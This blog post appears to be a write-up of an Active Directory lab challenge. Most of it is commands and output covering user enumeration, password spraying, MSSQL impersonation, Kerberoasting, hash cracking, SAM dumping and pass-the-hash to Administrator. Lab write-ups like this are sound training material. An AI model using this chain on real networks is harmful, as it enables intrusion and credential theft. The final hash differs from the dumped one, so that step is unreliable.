Hokkaido

ZEROZERO
5 min read

The "Hokkaido" machine provided a comprehensive learning experience in Active Directory exploitation. By combining enumeration, credential harvesting, and privilege escalation techniques, I successfully compromised the target system. Try solving this challenge yourself it's a fantastic way to sharpen your skills!

Tipps and lessons for this machine:

  • Always explore SMB shares thoroughly—they often contain valuable information like passwords or configuration files.

  • Tools like kerbrute and bloodhound-python are essential for identifying weak points in AD environments.

  • Understanding privilege escalation techniques is crucial for moving laterally within a network.

Attack Narrative

1. Initial Reconnaissance

To begin, I performed an nmap scan to identify open ports and services on the target machine:

sudo nmap -sS -sV -sC -p- -T5 $IP

Key findings included:

  • Port 53/tcp : DNS service.

  • Port 80/tcp : Microsoft IIS HTTP server.

  • Port 135/tcp , 139/tcp , 445/tcp : NetBIOS and SMB services.

  • Port 389/tcp , 636/tcp , 3268/tcp , 3269/tcp : LDAP/SSL services.

  • Port 1433/tcp : Microsoft SQL Server.

  • Port 3389/tcp : Remote Desktop Protocol (RDP).

2. User Enumeration

Using the kerbrute tool, I enumerated valid usernames against the Kerberos service:
link to the tool: https://github.com/ropnop/kerbrute
link to the username list: https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt

└─$ ./kerbrute userenum --dc $IP -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/10/24 - Ronnie Flathers @ropnop

2024/11/10 06:03:58 >  Using KDC(s):
2024/11/10 06:03:58 >   192.168.227.40:88

2024/11/10 06:03:59 >  [+] VALID USERNAME:       info@hokkaido-aerospace.com
2024/11/10 06:04:10 >  [+] VALID USERNAME:       administrator@hokkaido-aerospace.com                                                                     
2024/11/10 06:04:16 >  [+] VALID USERNAME:       INFO@hokkaido-aerospace.com
2024/11/10 06:04:41 >  [+] VALID USERNAME:       Info@hokkaido-aerospace.com
2024/11/10 06:05:10 >  [+] VALID USERNAME:       discovery@hokkaido-aerospace.com                                                                         
2024/11/10 06:05:12 >  [+] VALID USERNAME:       Administrator@hokkaido-aerospace.com                                                                     
2024/11/10 06:17:44 >  [+] VALID USERNAME:       maintenance@hokkaido-aerospace.com

3. Credential Discovery

I conducted a password spray attack using netexec against the identified users:

└─$ netexec smb 192.168.227.40 -u users.txt -p users.txt
--[snip]--
SMB         192.168.227.40  445    DC               [+] hokkaido-aerospace.com\info:info
--[snip]--

4. SMB Share Exploration

Using the info:info credentials, I explored the SMB shares and found a file named password_reset.txt in the NETLOGON share:

Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
homes           READ,WRITE      user homes
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
- password_reset.txt :: Initial Password: Start123!

5. Password Spraying

Next, I sprayed the password Start123! against the previously enumerated usernames:

└─$ netexec smb 192.168.227.40 -u users.txt -p 'Start123!'

--[snip]--
SMB         192.168.227.40  445    DC               [+] hokkaido-aerospace.com\discovery:Start123!
--[snip]--

6. Exploiting MSSQL

With the discovery credentials, I connected to the MSSQL server using impacket-mssqlclient:

impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@192.168.227.40 -windows-auth -dc-ip 192.168.227.40

By impersonating the hrappdb-reader account, I queried the hrappdb database and uncovered credentials for the hrapp-service user:

  • Username: hrapp-service

  • Password: Untimed$Runny

SQL (HAERO\discovery  guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name             
--------------   
hrappdb-reader   

SQL (HAERO\discovery  guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader  guest@master)> use hrappdb;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
SQL (hrappdb-reader  hrappdb-reader@hrappdb)> enable_xp_cmdshellERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (hrappdb-reader  hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
hrappdb         dbo            sysauth      b'BASE TABLE'   

SQL (hrappdb-reader  hrappdb-reader@hrappdb)> select * from sysauth;
id   name               password           
--   ----------------   ----------------   
 0   b'hrapp-service'   b'Untimed$Runny'

7. Kerberoasting

Using bloodhound-python, I mapped out relationships within the AD environment:

└─$ bloodhound-python -d hokkaido-aerospace.com -dc hokkaido-aerospace.com -u 'info' -p 'info' --zip -c All
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: hokkaido-aerospace.com
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: hokkaido-aerospace.com
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 34 users
INFO: Found 62 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: dc.hokkaido-aerospace.com
INFO: Done in 00M 11S
INFO: Compressing output into 20241110062353_bloodhound.zip

On bloodhound, I found that the user hrapp-service has generic-write on Hazel.Green so I used targetedkerberoast.py to get the hash and crack it

└─$ python3 targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Hazel.Green)
[+] Printing hash for (Hazel.Green)
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/Hazel.Green*$8674a45c...

└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
...6db0ec95b7001e:haze1988

8. Privilege Escalation

The Hazel.Green user belonged to the 2-tier-admin group, which controlled the 1-tier-admin group containing Molly.Smith. Using rpcclient, I reset the password for Molly.Smith:

└─$ rpcclient -N -U "Hazel.Green%haze1988" 192.168.227.40
rpcclient $> setuserinfo2 MOLLY.SMITH 23 'Password123!'

With these new credentials, I RDP'd into the machine and gained access as Molly.Smith.

└─$ xfreerdp /u:molly.smith /p:'Password123!' /v:192.168.227.40 +clipboard

9. Final Privilege Escalation

Once logged in, then i started PowerShell as admin and ran whoami /priv to see what privileges i have

Then i used the SeBackupPrivilege via PowerShell to extract the SAM and SYSTEM registry hives:

cmd /c "reg save HKLM\SAM & reg save HKLM\SYSTEM SYSTEM"

After i moved them to my machine i used impackets-secretsdump to extract the hashses

└─$ impacket-secretsdump -system SYSTEM local -sam SAM
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra

[*] Target system bootKey: 0x9ee80337b5848e02903e9c792b816b42
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f1014ac49bae005ee3ece5f47547d185:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:0c6ce171c9cc3afb29ca0ccc335e49bb:::
[*] Cleaning up...

Finally, I used evil-winrm to perform a pass the hash attack to authenticate as the Administrator user and completed the challenge:

└─$ evil-winrm -i 192.168.227.40 -u 'administrator' -H "d752482897d54e239376fddb2a2109e4"                                 
*Evil-WinRM* PS C:\Users\Administrator\Documents>
0
Subscribe to my newsletter

Read articles from ZERO directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Active Directoryhackingoffsechtb#HackTheBoxtryhackmeMSSQL

Written by

ZERO
ZERO

I'm Mohamed Nour Alhaj, an OSCP-certified penetration tester with a passion for ethical hacking and cybersecurity. I specialize in web, network, and Active Directory security and love sharing my knowledge.